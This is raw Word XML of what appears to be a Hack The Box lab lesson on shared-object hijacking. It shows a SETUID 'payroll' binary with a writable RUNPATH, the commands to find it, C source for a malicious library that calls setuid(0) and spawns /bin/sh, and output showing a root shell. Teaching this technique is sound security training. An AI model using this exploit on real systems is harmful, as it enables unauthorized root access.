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6BA2" w14:textId="77777777" w:rsidR="00127207" w:rsidRPr="00127207" w:rsidRDefault="00127207" w:rsidP="001272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</w:pPr>
      <w:r w:rsidRPr="001272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  <w:t>Shared Object Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245AFB7F" w14:textId="77777777" w:rsidR="00127207" w:rsidRPr="00127207" w:rsidRDefault="00127207" w:rsidP="001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6055A7C0">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="516F0237" w14:textId="77777777" w:rsidR="00127207" w:rsidRPr="00127207" w:rsidRDefault="00127207" w:rsidP="0012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Programs and binaries under development usually have custom libraries associated with them. Consider the following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SETUID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binary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB4D1F9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htb_student@NIX02:~$ ls -la payroll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E7F6B3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5EF02889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-rwsr-xr-x 1 root root 16728 Sep  1 22:05 payroll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E50052F" w14:textId="77777777" w:rsidR="00127207" w:rsidRPr="00127207" w:rsidRDefault="00127207" w:rsidP="0012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can use </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="001272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ldd</w:t>
        </w:r>
      </w:hyperlink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 print the shared object required by a binary or shared object.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Ldd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displays the location of the object and the hexadecimal address where it is loaded into memory for each of a program's dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE3A7C1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htb_student@NIX02:~$ ldd payroll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA75C20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1585F645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linux-vdso.so.1 =&gt;  (0x00007ffcb3133000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4562D9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libshared.so =&gt; /lib/x86_64-linux-gnu/libshared.so (0x00007f7f62e51000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EDF7FF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libc.so.6 =&gt; /lib/x86_64-linux-gnu/libc.so.6 (0x00007f7f62876000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4FD152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/lib64/ld-linux-x86-64.so.2 (0x00007f7f62c40000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501E0EE7" w14:textId="77777777" w:rsidR="00127207" w:rsidRPr="00127207" w:rsidRDefault="00127207" w:rsidP="0012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see a non-standard library named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libshared.so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listed as a dependency for the binary. As stated earlier, it is possible to load shared libraries from custom locations. One such setting is the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RUNPATH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configuration. Libraries in this folder are given preference over other folders. This can be inspected using the </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="001272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readelf</w:t>
        </w:r>
      </w:hyperlink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utility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2EA523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htb_student@NIX02:~$ readelf -d payroll  | grep PATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1481F4CD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58992214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0x000000000000001d (RUNPATH)            Library runpath: [/development]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BD4FA8" w14:textId="77777777" w:rsidR="00127207" w:rsidRPr="00127207" w:rsidRDefault="00127207" w:rsidP="0012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configuration allows the loading of libraries from the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/development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folder, which is writable by all users. This misconfiguration can be exploited by placing a malicious library in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/development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which will take precedence over other folders because entries in this file are checked first (before other folders present in the configuration files).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA59335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htb_student@NIX02:~$ ls -la /development/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0D346A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0EA0B063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total 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459B6C54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drwxrwxrwx  2 root root 4096 Sep  1 22:06 ./</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7697AC5A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drwxr-xr-x 23 root root 4096 Sep  1 21:26 ../</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BBF0BB" w14:textId="77777777" w:rsidR="00127207" w:rsidRPr="00127207" w:rsidRDefault="00127207" w:rsidP="0012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Before compiling a library, we need to find the function name called by the binary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0F0F79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htb_student@NIX02:~$ cp /lib/x86_64-linux-gnu/libc.so.6 /development/libshared.so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D1711E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htb_student@NIX02:~$ ldd payroll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15ED75C6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51CBF9BB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linux-vdso.so.1 (0x00007ffd22bbc000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19385BBE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libshared.so =&gt; /development/libshared.so (0x00007f0c13112000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22245594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/lib64/ld-linux-x86-64.so.2 (0x00007f0c1330a000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F3C22A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htb_student@NIX02:~$ ./payroll </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306CB653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559B6BA9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./payroll: symbol lookup error: ./payroll: undefined symbol: dbquery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467E269C" w14:textId="77777777" w:rsidR="00127207" w:rsidRPr="00127207" w:rsidRDefault="00127207" w:rsidP="0012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lastRenderedPageBreak/>
        <w:t xml:space="preserve">We can copy an existing library to the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development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folder. Running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ldd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against the binary lists the library's path as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/development/libshared.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so, which means that it is vulnerable. Executing the binary throws an error stating that it failed to find the function named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dbquery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 We can compile a shared object which includes this function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709BFDF2" w14:textId="77777777" w:rsidR="00127207" w:rsidRPr="00127207" w:rsidRDefault="00127207" w:rsidP="001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c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6A0D80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#include&lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E94A039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#include&lt;stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D37170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38B3C183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void dbquery() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631380AD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printf("Malicious library loaded\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3C4EA0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setuid(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA151E6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system("/bin/sh -p");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CFD579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} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453D5288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5C94017F" w14:textId="77777777" w:rsidR="00127207" w:rsidRPr="00127207" w:rsidRDefault="00127207" w:rsidP="0012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dbquery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function sets our user id to 0 (root) and executing </w:t>
      </w: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/bin/sh</w:t>
      </w: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when called. Compile it using </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="001272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GCC</w:t>
        </w:r>
      </w:hyperlink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350A5A07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htb_student@NIX02:~$ gcc src.c -fPIC -shared -o /development/libshared.so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692C7FCE" w14:textId="77777777" w:rsidR="00127207" w:rsidRPr="00127207" w:rsidRDefault="00127207" w:rsidP="0012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12720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Executing the binary again should display the banner and pops a root shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2FE3B1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htb_student@NIX02:~$ ./payroll </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273EDFAF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32180315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***************Inlane Freight Employee Database***************</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3B138B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1B69B050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Malicious library loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409DA75B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# id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2A3408" w14:textId="77777777" w:rsidR="00127207" w:rsidRPr="00127207" w:rsidRDefault="00127207" w:rsidP="0012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12720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uid=0(root) gid=1000(mrb3n) groups=1000(mrb3n)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BDAEEB" w14:textId="77777777" w:rsidR="00213442" w:rsidRDefault="00213442"/>
    <w:sectPr w:rsidR="0021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C5"/>
    <w:rsid w:val="00127207"/>
    <w:rsid w:val="00213442"/>
    <w:rsid w:val="00EB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1BB64"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0284DC40-1637-453F-B318-21F2A016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207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72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07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127207"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00127207"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-success">
    <w:name w:val="text-success"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0012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1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.die.net/man/1/gcc" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://man7.org/linux/man-pages/man1/readelf.1.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://manpages.ubuntu.com/manpages/bionic/man1/ldd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2023-08-03T07:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-03T07:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>